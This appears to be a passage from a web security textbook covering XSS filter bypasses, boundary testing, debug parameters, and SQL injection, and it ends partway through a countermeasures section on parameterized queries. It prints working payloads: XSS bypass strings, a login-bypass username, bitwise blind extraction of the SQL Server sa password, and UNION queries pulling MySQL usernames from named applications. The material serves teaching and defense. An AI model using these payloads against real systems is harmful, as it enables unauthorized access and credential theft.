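As an illustration, here is a small Python sketch of that encoding step. It relies on the standard library's html.escape, which also encodes ampersands and quotes in addition to the angle brackets discussed above; the function name encode_for_html is our own.

```python
import html


def encode_for_html(value: str) -> str:
    """Encode <, >, &, and quotes so the browser treats them as text."""
    return html.escape(value, quote=True)


# The brackets come back as &lt; and &gt;, so no tag is ever formed.
print(encode_for_html("<script>alert(1)</script>"))
```

The encoding should be applied at the point where data is written into the page, so that every redisplayed value passes through it.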

Some applications intend to let users specify certain HTML tags such as bold, italics, and underline. In these cases, use regular expressions to validate the data. These checks should be inclusive, rather than exclusive. In other words, they should only look for acceptable tags, permit those tags, and HTML-encode all remaining brackets. For example, an inadequate regular expression that tries to catch <script> tags can be tricked:

   <scr%69pt>
   <<script>
   <a href="javascript:commands..."></a>
   <b+<script>
   <scrscriptipt> (bypasses regular expressions that replace "script" with null)

In this case, obviously it is easier to check for the presence of a positive (<b> is present) rather than the absence of a negative (<script> is not present).
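One way to sketch the inclusive approach in Python is to encode everything first and then restore only the tags on an allow list. The tag list (b, i, u) and the function name sanitize are assumptions for this example, and tags with attributes are deliberately not restored.

```python
import html
import re

# Tags the application chooses to permit (an assumption for this sketch).
ALLOWED = ("b", "i", "u")

# Matches an encoded opening or closing tag with no attributes, e.g. &lt;b&gt;
_ALLOWED_RE = re.compile(r"&lt;(/?)(%s)&gt;" % "|".join(ALLOWED), re.IGNORECASE)


def sanitize(value: str) -> str:
    # Step 1: HTML-encode every bracket, ampersand, and quote.
    encoded = html.escape(value, quote=True)
    # Step 2: restore only the exact tags we are willing to accept.
    return _ALLOWED_RE.sub(r"<\1\2>", encoded)


for sample in ("<b>bold</b>", "<<script>", "<b+<script>", "<scrscriptipt>"):
    print(sample, "->", sanitize(sample))
```

Because nothing is ever removed from the input, tricks that depend on a filter deleting text (such as the nested "script" string) have nothing to work with.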

More information about XSS and alternate ways in which payloads can be encoded is found at RSnake’s excellent XSS reference: http://ha.ckers.org/xss.html.

Boundary Checks

Numeric fields have much potential for misuse. Even if the application properly restricts the data to numeric values, some of those values may still cause an error. Boundary checking is the simple technique of trying the extremes of a value. Swapping out UserID=19237 for UserID=0 or UserID=-1 may generate informational errors or strange behavior. The upper bound should also be checked. A one-byte value cannot be greater than 255. A two-byte value cannot be greater than 65,535.

   1. http://www.victim.com/internal/CompanyList.asp?SortID=255
   Error: Your Search has timed out with too long of a list.

   2. http://www.victim.com/internal/CompanyList.asp?SortID=256
   Search Results

   3. http://www.victim.com/internal/CompanyList.asp?SortID=0
   Search Results

Notice that setting SortID to 255 does not return a successful query, but setting it to 256 in example 2 returns a query successfully. When SortID=0, in example 3, a successful query also occurs. It would seem that the application only expects an 8-bit value for SortID, which would make the acceptable range between 0 and 255—except that 255 is too long. Thus, we can safely assume that 256 is being interpreted as the value of 0 based on the fact that an unsigned 8-bit value “rolls over” after 255. Therefore, example requests 2 and 3 are equivalent in this case, which allows the user to determine the boundary of the value used in this portion of the application.
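The rollover can be reproduced in a few lines of Python. This is only a model of the inferred behavior, assuming the application keeps the low 8 bits of the value; the function name is ours.

```python
def as_unsigned_8bit(value: int) -> int:
    """Keep only the low 8 bits, as a one-byte unsigned field would."""
    return value & 0xFF


for sort_id in (0, 255, 256, 257):
    print(sort_id, "->", as_unsigned_8bit(sort_id))
```

Under this assumption, 256 maps to 0, which is consistent with requests 2 and 3 returning the same result.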

You (probably) won’t gain command execution or arbitrary file access from boundary checks. However, the errors they generate can reveal useful information about the application or the server. This check only requires a short list of values:

Boolean Any value that has some representation of true or false (T/F, true/false, yes/no, 0/1). Try both values; then try a nonsense value. Use numbers for arguments that accept characters; use characters for arguments that accept digits.

Numeric Set zero and negative values (0 and -1 work best). Try the limits of various bit ranges (256, 65536, 4294967296) as well as values very close to those limits, such as 255 and 257.

String Test length limitations. Determine if string variables, such as name and address, accept punctuation characters.
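A short list of numeric test values can be generated rather than typed by hand. The following Python sketch assumes 8-, 16-, and 32-bit fields are the ones of interest; the function name and default widths are our own choices.

```python
def numeric_boundaries(bit_widths=(8, 16, 32)):
    """Return zero, -1, and the values around each power-of-two limit."""
    values = {0, -1}
    for bits in bit_widths:
        limit = 2 ** bits
        # One below, exactly at, and one above the limit.
        values.update({limit - 1, limit, limit + 1})
    return sorted(values)


print(numeric_boundaries())
```

Each value can then be substituted into a numeric parameter in turn while watching for errors or changes in behavior.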

Manipulate Application Behavior

Some applications may have special directives that the developers used to perform tests. One of the most prominent is debug=1. Appending this to a GET or POST request could return more information about variables, the system, or backend database connectivity. A successful attack may require some combination of a parameter name such as debug or dbg and a value such as true, T, or 1.
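The combinations are easy to enumerate. This Python sketch builds every name and value pair mentioned above as a query-string fragment; the two tuples hold only the names and values from the text, and the function name is ours.

```python
from itertools import product
from urllib.parse import urlencode

NAMES = ("debug", "dbg")
VALUES = ("true", "T", "1")


def debug_parameters():
    """Return each name=value pair as an encoded query-string fragment."""
    return [urlencode({name: value}) for name, value in product(NAMES, VALUES)]


print(debug_parameters())
```

Each fragment can be appended to a request with & (or ? if the URL has no other parameters).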

Some platforms may allow internal variables to be set on the URL. Other attacks target the web server. Inserting %3f.jsp will return directory listings against JRun 3.0 and 3.1 and Tomcat 3.2.3.

Search Engines

The mighty percent (%) often represents a wildcard match in SQL or search engines. Submitting the percent symbol in a search field might return the entire database content, or generate an informational error, as in the following example:

   http://victim.com/users/search?FreeText=on&kw=on&ss=%
   Exception in com.motive.web411.Search.processQuery(Compiled Code):
   java.lang.StringIndexOutOfBoundsException: String index out of range:
   3 at java.lang.String.substring(Compiled Code) at
   javax.servlet.http.HttpUtils.parseName(Compiled Code) at
   javax.servlet.http.HttpUtils.parseQueryString(Compiled Code) at
   com.motive.mrun.MotiveServletRequest.parseParameters(Compiled Code)
   at com.motive.mrun.MotiveServletRequest.getParameterValues(Compiled
   Code) at com.motive.web411.MotiveServlet.getParamValue(Compiled Code)
   at com.motive.web411.Search.processQuery(Compiled Code) at
   com.motive.web411.Search.doGet(Compiled Code) at
   javax.servlet.http.HttpServlet.service(Compiled Code) at
   javax.servlet.http.HttpServlet.service(Compiled Code) at
   com.motive.mrun.ServletRunner.RunServlet(Compiled Code)

SQL also uses the underscore (_) to represent a single-character wildcard match. Web applications that employ LDAP backends may also be exposed to similar attacks based on the asterisk (*), which represents a wildcard match in that protocol.
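The wildcard behavior is easy to observe with an in-memory SQLite database in Python. The table and its rows are invented for the demonstration; note that the search term is bound as a parameter, so this is not SQL injection, yet % and _ still keep their special meaning inside LIKE.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",), ("bo",)])


def search(term):
    # The term is bound safely, but LIKE still interprets % and _.
    rows = conn.execute(
        "SELECT name FROM users WHERE name LIKE ? ORDER BY name", (term,)
    )
    return [row[0] for row in rows]


print(search("%"))    # matches every row
print(search("bo_"))  # matches "bo" followed by exactly one character
```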

SQL Injection

One very popular attack that targets an application’s backend database is SQL injection. SQL injection is a style of code injection. Unlike XSS code injection that typically uses JavaScript to target the browser, SQL injection targets the SQL statement being executed by the application on the backend database. This attack involves injecting SQL into a dynamically constructed query that is then run on the backend database. Most commonly, the malicious input is concatenated directly into a SQL statement within the application code but SQL injection can also occur within stored procedures. By injecting SQL syntax, the logic of the statement can be modified so it performs a different action when executed. A quick test on a user input field that is used to query a database is to send a single quotation mark on the end of the value. In SQL syntax, the single quote delimits the start or end of a string value. Thus, when the single quote is injected into a vulnerable SQL statement, it has the potential to disrupt the pairing of string delimiters and generate an application error, which indicates a potential SQL injection vulnerability.

   http://www.website.com/users.asp?id=alex'

If the request generates an error, it is a good indication of a mishandled quotation mark and the application may be vulnerable to SQL injection attacks. Another popular attack against numeric fields is to inject OR 1=1, which changes how the WHERE conditional statement is interpreted. An example test would look like the following:

   http://www.website.com/userProfile.asp?id=1378 OR 1=1

Closely examining the application behavior differences when the id is equal to 1378 versus 1378 OR 1=1 may indicate a SQL injection vulnerability.
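To see why the response changes, consider this deliberately vulnerable lookup, sketched in Python with an in-memory SQLite database. The profiles table, its rows, and the lookup function are all hypothetical stand-ins for whatever the real application does.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE profiles (id INTEGER, name TEXT)")
conn.executemany(
    "INSERT INTO profiles VALUES (?, ?)",
    [(1378, "alex"), (1379, "mike"), (1380, "sam")],
)


def lookup(id_param: str):
    # Vulnerable on purpose: the parameter is concatenated into the query.
    query = "SELECT name FROM profiles WHERE id = " + id_param
    return [row[0] for row in conn.execute(query)]


print(lookup("1378"))         # one profile
print(lookup("1378 OR 1=1"))  # the WHERE clause is now always true
```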

SQL injection vulnerabilities may be found in any application parameter that influences a database query. Attack points include the URL parameters, POST data, and cookie values. The simplest way to identify a SQL injection vulnerability is to add invalid or unexpected characters to a parameter value and watch for errors in the application’s response. This syntax-based approach is most effective when the application doesn’t suppress error messages from the database. When such error handling is implemented (or some simple input validation is present), then vulnerabilities can also be identified through semantic techniques that test the application’s behavior to valid SQL constructs.

Syntax tests involve injecting characters into a parameter with the intent of disrupting the syntax of the database query. The goal is to find a character that generates an error when the query is executed by the database, and is then propagated back through the application and returned in the server’s response. We’ll start with the most common injection character, the single quote ('). Remember the single quote is used to delineate string values in a SQL statement. Our first SQL injection test looks like this:

   http://website/aspnuke/module/support/task/detail.asp?taskid=1'

The server’s response, as seen in a browser, shows a database error and the invalid query that the application tried to submit to the database. Look for the WHERE tsk.TaskID=1' string near the end of the error message in Figure 6-1 to see where the injected character ended up.

Now let’s take a look at how and why this works: string concatenation. Many queries in a web application have a clause that is modified by some user input. In the previous example, the detail.asp file uses the value of the taskid parameter as part of the query.

Figure 6-1 Verbose error message

Here is a portion of the source code. Look at the WHERE clause, where the taskid parameter is concatenated into the query (some lines have been removed for readability):

   sStat = "SELECT tsk.TaskID, tsk.Title, tsk.Comments" &_
   ...
   "FROM tblTask tsk " &_
   ...
   "WHERE tsk.TaskID = " & steForm("taskid") & " " &_
   "AND tsk.Active <> 0 " &_
   "AND tsk.Archive = 0"
   Set rsArt = adoOpenRecordset(sStat)

The use of string concatenation to create queries is one of the root causes of SQL injection. When a parameter’s value is placed directly into the string, an attacker can easily inject malicious input to alter the behavior of the query. So, instead of creating a valid query with a numeric argument as shown here,

   SELECT tsk.TaskID, tsk.Title, tsk.Comments FROM tblTask tsk
   WHERE tsk.TaskID = 1 AND tsk.Active <> 0 AND tsk.Archive = 0

the attacker disrupts the syntax by introducing an unmatched quote character:

   SELECT tsk.TaskID, tsk.Title, tsk.Comments FROM tblTask tsk
   WHERE tsk.TaskID = 1' AND tsk.Active <> 0 AND tsk.Archive = 0

The incorrect syntax creates an error, which is often transmitted back to the user’s web browser. A common error message looks like this:

   [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax...
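The same failure can be reproduced outside of ASP. The Python sketch below rebuilds the query by concatenation against an in-memory SQLite database; the column types are guesses, and SQLite's error text differs from the SQL Server message shown above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE tblTask (TaskID INTEGER, Title TEXT, Comments TEXT, "
    "Active INTEGER, Archive INTEGER)"
)


def task_detail(taskid: str):
    # Mirrors the concatenation in detail.asp; vulnerable on purpose.
    query = (
        "SELECT tsk.TaskID, tsk.Title, tsk.Comments FROM tblTask tsk "
        "WHERE tsk.TaskID = " + taskid + " "
        "AND tsk.Active <> 0 AND tsk.Archive = 0"
    )
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error as exc:
        # A verbose application would pass this text back to the browser.
        return "database error: %s" % exc


print(task_detail("1"))   # valid query, no matching rows
print(task_detail("1'"))  # unmatched quote breaks the syntax
```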

Inserting a single quote and generating an error won’t reveal passwords or enable the attacker to bypass access restrictions, but it’s often a prerequisite. Of course, this technique relies on the fact that the application will return some sort of message to indicate a database error occurred. Table 6-1 lists some common error strings produced by databases. This list is by no means comprehensive, but it should give you an idea of what errors look like. In many cases, the actual SQL statement accompanies the error message. Also note that these errors range across database platform and development language.

Finally, some errors occur in the application layer before a statement is constructed or a query is sent to the database. Table 6-2 lists some of these error messages. Distinguishing the point where an error occurs is important. The threat to an application differs greatly between an attack that generates a parsing error (such as trying to convert a string to an integer) and an attack that can rewrite the database query.

Any dynamic data that the user can modify represents a potential attack vector. Keep in mind that cookie values should be tested just like other parameters. Figure 6-2 shows an error when a single quote is appended to a cookie value for a very old version of phpBB.

Table 6-1 Common Database Error Messages

Now that we’ve determined how to find a SQL injection vulnerability, it’s time to determine the vulnerability’s impact on the application’s security. It’s one thing to produce an error by inserting a single quote into a cookie value or substituting a POST parameter with a MOD() function; it’s another thing to be able to retrieve arbitrary information from the database.

Databases store information, so it’s no surprise that targeting data with an attack is probably the first thing that comes to mind. However, if we can use SQL injection to change the logic of a query, then we could possibly change a process flow in the application. A good example is the login prompt. A database-driven application may use a query similar to the following example to validate a username and password from a user.

   SELECT COUNT(ID) FROM UserTable WHERE UserId='+ strUserID +
   ' AND Password=' + strPassword + '

Table 6-2 Common Parsing Errors

Figure 6-2 Verbose error due to an unexpected cookie value

If the user supplies arguments for the UserId and Password that match a record in the UserTable, then the COUNT(ID) will be equal to one. The application will permit the user to pass through the login page in this case. If the COUNT(ID) is NULL or zero, then that means the UserId or Password is incorrect and the user will not be permitted to access the application.

Now, imagine if no input validation were performed on the username parameter. We could rewrite the query in a way that will ensure the SELECT statement succeeds—and only needs a username to do so! Here’s what a modified query looks like:

   SELECT COUNT(ID) FROM UserTable WHERE UserId='mike'-- ' AND Password=''

Notice that the username includes a single quote and a comment delimiter. The single quote correctly delineates the UserId (mike) and the double dash followed by a space represents a comment, which means everything to the right is ignored. The username would have been entered into the login form like this:

   mike'--%20
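The effect of that username can be demonstrated with a deliberately vulnerable login check, sketched here in Python against an in-memory SQLite database. The stored password and the login function are invented for the example (and a real application should never store plaintext passwords).

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE UserTable (ID INTEGER, UserId TEXT, Password TEXT)")
conn.execute("INSERT INTO UserTable VALUES (1, 'mike', 's3cret')")


def login(user_id: str, password: str) -> bool:
    # Vulnerable on purpose: both values are concatenated into the query.
    query = (
        "SELECT COUNT(ID) FROM UserTable WHERE UserId='" + user_id +
        "' AND Password='" + password + "'"
    )
    (count,) = conn.execute(query).fetchone()
    return count == 1


print(login("mike", "wrong"))  # password check applies
print(login("mike'-- ", ""))   # password check is commented out
```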

In this way, we’ve used SQL injection to alter a process flow in the application rather than try to retrieve some arbitrary data. This attack might work against a login page to allow us to view the profile information for a user account or bypass access controls. Table 6-3 lists some other SQL constructs that you can try as part of a parameter value. These are the raw payloads; remember to encode spaces and other characters so their meaning is not changed in the HTTP request. For example, spaces can be encoded with %20 or the plus symbol (+).
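Python's standard urllib.parse module can handle the encoding. The sketch below shows both encodings of the space for the username payload used above.

```python
from urllib.parse import quote, quote_plus

payload = "mike'-- "

# quote() encodes the space as %20; quote_plus() encodes it as +.
encoded_percent = quote(payload)
encoded_plus = quote_plus(payload)

print(encoded_percent)  # mike%27--%20
print(encoded_plus)     # mike%27--+
```

Note that the single quote is encoded as well (%27); the server decodes it back before the application sees the value.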

Table 6-3 Characters to Modify a Query

Since databases contain the application’s core information, they represent a high-profile target. An attacker who wishes to grab usernames and passwords might try phishing and social engineering attacks against some of the application’s users. On the other hand, the attacker could try to pull everyone’s credentials from the database.

Subqueries

Subqueries can retrieve information ranging from Boolean indicators (whether a record exists or is equal to some value) to arbitrary data (a complete record). Subqueries are also a good technique for semantic-based vulnerability identification. A properly designed subquery enables the attacker to infer whether a request succeeded or not.

The simplest subqueries use the logical AND operator to force a query to be false or to keep it true:

   AND 1=1
   AND 1=0

Now, the important thing is that the subquery be injected such that the query’s original syntax suffers no disruption. Injecting into a simple query is easy:

   SELECT price FROM Products WHERE ProductId=5436 AND 1=1

More complex queries that have several levels of parentheses and clauses with JOINs might not be as easy to inject with that basic method. In this case, we alter the approach and focus on creating a subquery from which we can infer some piece of information. For example, here’s a simple rewrite of the example query:

   SELECT price FROM Products WHERE ProductId=(SELECT 5436)

We can avoid most problems with disrupting syntax by using the (SELECT foo) subquery technique and expanding it into more useful tests. We don’t often have access to the original query’s syntax, but the syntax of the subquery, like SELECT foo, is one of our making. In this case, we need not worry about matching the number of opening or closing parentheses or other characters. When a subquery is used as a value, its content is resolved before the rest of the query. In the following example, we try to count the number of users in the default mysql.user table whose name equals “root”. If there is only one entry, then we’ll see the same response as when using the value 5436 (5435+1 = 5436).

   SELECT price FROM Products WHERE ProductId=(SELECT 5435+(SELECT
   COUNT(user) FROM mysql.user WHERE user=0x726f6f74))

This technique could be adapted to any database and any particular SELECT statement. Basically, we just fashion the statement such that it will return a numeric (or true/false) value.

   SELECT price FROM Products WHERE ProductId=(SELECT 5435+(SELECT
   COUNT(*) FROM SomeTable WHERE column=value))
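The inference can be tried against an in-memory SQLite database in Python. Everything here is a stand-in: the accounts table plays the role of mysql.user, the price is arbitrary, and price_for is a deliberately vulnerable function.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Products (ProductId INTEGER, price REAL)")
conn.execute("INSERT INTO Products VALUES (5436, 19.99)")
conn.execute("CREATE TABLE accounts (user TEXT)")  # stand-in for mysql.user
conn.execute("INSERT INTO accounts VALUES ('root')")


def price_for(product_param: str):
    # Vulnerable on purpose: the parameter is concatenated into the query.
    query = "SELECT price FROM Products WHERE ProductId=" + product_param
    return conn.execute(query).fetchall()


baseline = price_for("5436")
# COUNT is 1, so the subquery resolves to 5436 and the page looks normal.
probe = price_for(
    "(SELECT 5435+(SELECT COUNT(user) FROM accounts WHERE user='root'))"
)
# COUNT is 0, so the subquery resolves to 5435 and no product is found.
miss = price_for(
    "(SELECT 5435+(SELECT COUNT(user) FROM accounts WHERE user='nobody'))"
)
print(baseline, probe, miss)
```

Comparing the probe response with the baseline answers a yes/no question about data the page never displays.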

Subqueries can also be further expanded so you’re not limited to inferring the success or failure of a SELECT statement. They can be used to enumerate values, albeit in a slower, roundabout manner. For example, you can apply bitwise enumeration to extract the value of any column from a custom SELECT subquery. This is based on being able to distinguish different responses from the server when injecting AND 1=1 and AND 1=0.

Bitwise enumeration is based on testing each bit in a value to determine if it is set (equivalent to AND 1=1) or unset (equivalent to AND 1=0). For example, here is what bitwise comparison for the letter a (ASCII 0x61) looks like. It would take eight requests to the application to determine this value (in fact, ASCII text only uses seven bits, but we’ll refer to all eight for completeness):

   0x61 & 1 = 1
   0x61 & 2 = 0
   0x61 & 4 = 0
   0x61 & 8 = 0
   0x61 & 16 = 0
   0x61 & 32 = 32
   0x61 & 64 = 64
   0x61 & 128 = 0
   0x61 = 01100001 (binary)
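The table can be reproduced with a short Python loop, which may help when checking other characters by hand.

```python
value = ord("a")  # 0x61

# Test each of the eight bits with a power-of-two mask.
results = [value & (2 ** p) for p in range(8)]
for p, result in enumerate(results):
    print("0x%02x & %3d = %d" % (value, 2 ** p, result))

bits = format(value, "08b")
print("0x%02x = %s (binary)" % (value, bits))
```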

The comparison template for a SQL injection subquery is shown in the following pseudo-code example. Two loops are required: one to enumerate each byte of the string (i) and one to enumerate each bit in the byte (n):

   for i = 1 to length(column result):
       for p = 0 to 7:
           n = 2**p
           AND n IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & n FROM clause)

This creates a series of subqueries like this:

   AND 1 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 1 FROM clause)
   AND 2 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 2 FROM clause)
   AND 4 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 4 FROM clause)
   ...
   AND 128 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 128 FROM clause)
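The two loops can be simulated in Python without a database. In this sketch the oracle function stands in for a single HTTP request: it returns True when the response would match the AND 1=1 page. The SECRET value and both function names are invented for the illustration.

```python
SECRET = "sa"  # stands in for the column value held by the database


def oracle(i: int, n: int) -> bool:
    """Simulate one request: is bit n set in character i (1-based)?"""
    return (ord(SECRET[i - 1]) & n) == n


def enumerate_value(length: int):
    recovered = []
    requests = 0
    for i in range(1, length + 1):   # each character position
        byte = 0
        for p in range(8):           # each bit in the byte
            n = 2 ** p
            requests += 1
            if oracle(i, n):
                byte |= n            # response matched AND 1=1: bit is set
        recovered.append(chr(byte))
    return "".join(recovered), requests


print(enumerate_value(len(SECRET)))
```

The request count is always eight times the length of the value, which is why this technique is slow but dependable.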

Finally, this is what a query might look like that enumerates the sa user password from a Microsoft SQL Server database (you would need to iterate n 8 times through each position i 48 times for 384 requests). The sa user is a built-in administrator account for SQL Server databases; think of it like the Unix root or Windows Administrator accounts. So it is definitely dangerous if the sa user’s password can be extracted via a web application. Each time a response comes back that matches the injection of AND 1=1, the bit equals 1 in that position:

   AND n IN
   (
   SELECT CONVERT(INT,SUBSTRING(password,i,1)) & n
   FROM master.dbo.sysxlogins
   WHERE name LIKE 0x73006100
   )

Subqueries take advantage of complex SQL constructs to infer the value of a SELECT statement. They are limited only by internal data access controls and the characters that can be included in the payload.

UNION

The SQL UNION operator combines the result sets of two different SELECT statements. This enables a developer to use a single query to retrieve data from separate tables as one result set. The following is a simple example of a UNION operator that will return records with three columns:

   SELECT c1,c2,c3 FROM table1 WHERE foo=bar UNION
   SELECT d1,d2,d3 FROM table2 WHERE this=that

A major restriction to the UNION operator is that the number of columns in each record set must match. This isn’t a terribly difficult thing to overcome; it just requires some patience and brute-force.

Column undercounts, where the second SELECT statement has too few columns, are easy to address. Any SELECT statement will accept repeat column names or a value. For example, these are all valid queries that return four columns:

   SELECT c,c,c,c FROM table1
   SELECT c,1,1,1 FROM table1
   SELECT c,NULL,NULL,NULL FROM table1

Column overcounts, where the second SELECT statement has too many columns, are just as easy to address. In this case, use the CONCAT() function to concatenate all of the results to a single column:

   SELECT CONCAT(a,b,c,d,e) FROM table1
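Both adjustments can be tried with an in-memory SQLite database in Python. The tables and values are invented, and the sketch uses SQLite's || concatenation operator in place of CONCAT(), since the available function varies by database.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE table1 (c1 TEXT, c2 TEXT, c3 TEXT)")
conn.execute("CREATE TABLE table2 (a TEXT, b TEXT, c TEXT, d TEXT, e TEXT)")
conn.execute("INSERT INTO table1 VALUES ('x', 'y', 'z')")
conn.execute("INSERT INTO table2 VALUES ('1', '2', '3', '4', '5')")

# Undercount: the right-hand SELECT has one useful column, so pad with NULL.
padded = conn.execute(
    "SELECT c1, c2, c3 FROM table1 "
    "UNION ALL SELECT a, NULL, NULL FROM table2"
).fetchall()

# Overcount: fold five columns into one, then pad the rest.
squeezed = conn.execute(
    "SELECT c1, c2, c3 FROM table1 "
    "UNION ALL SELECT a || b || c || d || e, NULL, NULL FROM table2"
).fetchall()

print(padded)
print(squeezed)
```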

Let’s take a look at how the UNION operator is used with a SQL injection exploit. It’s only a small step from understanding how UNION works to using it against a web application. First, we’ll verify that a parameter is vulnerable to SQL injection. We’ll do this by appending an alpha character to a numeric parameter. This results in an error like the one in Figure 6-3. Notice that the error provides details about the raw query—most especially the number of columns, 12, in the original SELECT.

We could also have tested for this vulnerability using a “blind” technique by comparing the results of these two URLs:

   http://website/freznoshop-1.4.1/product_details.php?id=43
   http://website/freznoshop-1.4.1/product_details.php?id=MOD(43,44)

An error could also have been generated with this URL (note the invalid use of the MOD() function):

   http://website/freznoshop-1.4.1/product_details.php?id=MOD(43,a)

Figure 6-3 Application error that reveals database fields

In any case, the next step is to use a UNION operator to retrieve some information from the database. The first step is to match the number of columns. We verify the number (12) with two different requests. We’ll continue to use the http://website/freznoshop-1.4.1/ URL. The complete URL is somewhat long when we include the UNION statement. So we’ll just show how the id parameter is modified rather than include the complete URL. We expect that we’ll need 12 columns, but we’ll submit a request with 11 columns to demonstrate an error when the UNION column sets do not match.

   id=43+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1/*

Figure 6-4 shows the error returned when this id value is submitted to the application. Note that the error explicitly states an unmatched number of columns.

   id=43+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,1/*

If we then modify the id parameter with 12 columns in the right-hand set of UNION, the query is syntactically valid and we receive the page associated with id=43. Figure 6-5 shows the page when no error is present.

Figure 6-4 Using column placeholders to establish a valid UNION query

Figure 6-5 Successful UNION query displays user id.

Of course, the real reason to use a UNION operator is to retrieve arbitrary data. Up to this point, we’ve only succeeded in finding a vulnerability and matching the number of columns. Since our example application uses a MySQL database, we’ll try to retrieve user credentials associated with MySQL. MySQL stores database-related accounts in a manner different from Microsoft SQL Server, but we can now access the default table names and columns. Notice the response in Figure 6-6. There is an entry in the table that reads 1 .: root; this is the username (root) returned by the UNION query. This is the value submitted to the id parameter:

   id=43+UNION+SELECT+1,cast(user+AS+CHAR(30)),1,1,1,1,1,1,1,1,1,1+FROM+
   mysql.user/*

Of course, there are several intermediate steps necessary to get to the previous value for id. The initial test might start out with one of these entries,

   id=43'
   id=43/*

and then move on to using a UNION statement to extract data from an arbitrary table. In this example, it was necessary to create a SELECT on 12 columns on the right-hand side of the UNION statement in order to match the number of columns on the left-hand side. This number is typically reached through trial and error, e.g., try one column, then two, then three, and so on. Finally, we discovered that the result of the second column would be displayed in the web application, which is why the other columns have 1 as a placeholder.
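The trial-and-error step lends itself to automation. The Python sketch below models it against an in-memory SQLite database: a hypothetical 12-column products table stands in for the application's query, an accounts table stands in for mysql.user, and run is a deliberately vulnerable function. SQLite raises an error whenever the two sides of a UNION have different column counts, which is the signal the loop relies on.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
columns = ", ".join("c%d INTEGER" % i for i in range(1, 13))
conn.execute("CREATE TABLE products (%s)" % columns)
conn.execute("CREATE TABLE accounts (user TEXT)")  # stand-in for mysql.user
conn.execute("INSERT INTO accounts VALUES ('root')")


def run(id_param: str):
    # Vulnerable on purpose: the parameter is concatenated into the query.
    return conn.execute("SELECT * FROM products WHERE c1 = " + id_param).fetchall()


def find_column_count(limit: int = 20):
    """Add one placeholder at a time until the UNION stops failing."""
    for n in range(1, limit + 1):
        placeholders = ",".join(["1"] * n)
        try:
            run("43 UNION SELECT " + placeholders)
        except sqlite3.OperationalError:
            continue  # column counts do not match yet
        return n
    return None


count = find_column_count()
# Put the interesting column in position 2 and pad the rest with 1.
rows = run("43 UNION SELECT 1,user" + ",1" * (count - 2) + " FROM accounts")
print(count, rows)
```

Against a real application the "error" signal would be a change in the HTTP response rather than a Python exception.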

Figure 6-6 Successful UNION query reveals username.


TIP

The CAST() function was necessary to convert MySQL’s internal storage type (utf8_bin) for the username to the storage type expected by the application (latin1_swedish_ci). The CAST() function is part of the SQL:2003 standard and is supported by all popular databases. It may or may not be necessary depending on the platform.


Like many SQL injection techniques, the UNION operator works best when the parameter’s value is not wrapped by single quotes (as for numeric arguments) or when single quotes can be included as part of the payload. When UNION can be used, the methodology is simple:

• Identify vulnerability.

• Match the number of columns in the original SELECT query.

• Create a custom SELECT query.

Enumeration

All databases have a collection of information associated with their installation and users. Even if the location of application-specific data cannot be determined, there are several tables and other information that can be enumerated to determine versions, patches, and users.

SQL injection is by far the most interesting attack that can be performed against a datastore, but it’s not the only one. Other attacks might take advantage of inadequate security policies in a catalog or table. After all, if you can access someone else’s personal profile by changing a URL parameter from 655321 to 24601, then you don’t need to inject malicious characters or try an alternate syntax.

One of the biggest challenges with applications that rely on database access is how to store the credentials securely. On many platforms, the credentials are stored in a text file that is outside the web document root. Yet, in some cases, the credentials may be hard-coded in an application source file within the web document root. In this latter case, the confidentiality of the username and password relies on preventing unauthorized access to the source code.

SQL Injection Countermeasures

An application’s database contains important information about the application and its users. Countermeasures should address the types of attacks that can be performed against a database as well as minimize the impact of a compromise in case a particular defense proves inadequate.

Filtering user-supplied data is probably the most repeated countermeasure for web applications. Proper input validation protects the application not only from SQL injection, but also from other parameter manipulation attacks as well. Input validation of values destined for a database can be tricky. For example, it has been demonstrated how dangerous a single quote character can be, but then how do you handle a name like O’Berry or any sentence that contains a contraction?

Validation routines for values bound for a database are not much different from filters for other values. Here are some things to keep in mind:

Escape characters Characters such as the single quote (apostrophe) have a specific meaning in SQL statements. Prepared statements and parameterized queries prevent dangerous characters from being misinterpreted in SQL statements. Unless you use them 100 percent of the time, make sure to escape such characters (for example, \' or '', depending on the database) to prevent them from disrupting the query. Always do this if you rely on string concatenation to create queries.

Deny characters You can strip characters that you know to be malicious or that are inappropriate for the expected data. For example, an e-mail address only contains a specific subset of punctuation characters; it doesn’t need the parentheses.

Appropriate data types Whenever possible, assign integer values to integer data types and so on for all of the user-supplied data. An attacker might still produce an error, but the error will occur when assigning a parameter’s value and not within the database.

The strongest protection is provided when properly using parameterized queries (also known as prepared statements). The following code exemplifies one way to implement a parameterized query in an application:

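   // Requires: using System.Data.SqlClient;
   // connectionString and email are assumed to be defined by the caller.
   SqlConnection conn = new SqlConnection(connectionString);
   conn.Open();
   string s = "SELECT email, passwd, login_id, full_name " +
     "FROM members WHERE email = @email";
   // Associate the command with the open connection.
   SqlCommand cmd = new SqlCommand(s, conn);
   // Bind the user-supplied value as data rather than as SQL text.
   cmd.Parameters.AddWithValue("@email", email);
   SqlDataReader reader = cmd.ExecuteReader();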

In addition to being more secure, the parameterized code offers performance benefits: fewer string concatenations, no manual string escapes, and, depending on the DBMS in use, a query that may be hashed and stored for precompiled execution.
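The same idea can be sketched in Python with the standard sqlite3 module. This is a minimal illustration rather than the application's actual data layer: the in-memory members table, its two rows, and the find_member helper are all assumptions made for the example.

```python
import sqlite3

def find_member(conn, email):
    """Look up a member by e-mail using a bound parameter."""
    # The ? placeholder is filled in by the driver. The value is never
    # spliced into the SQL text, so quotes in it cannot change the query.
    cur = conn.execute(
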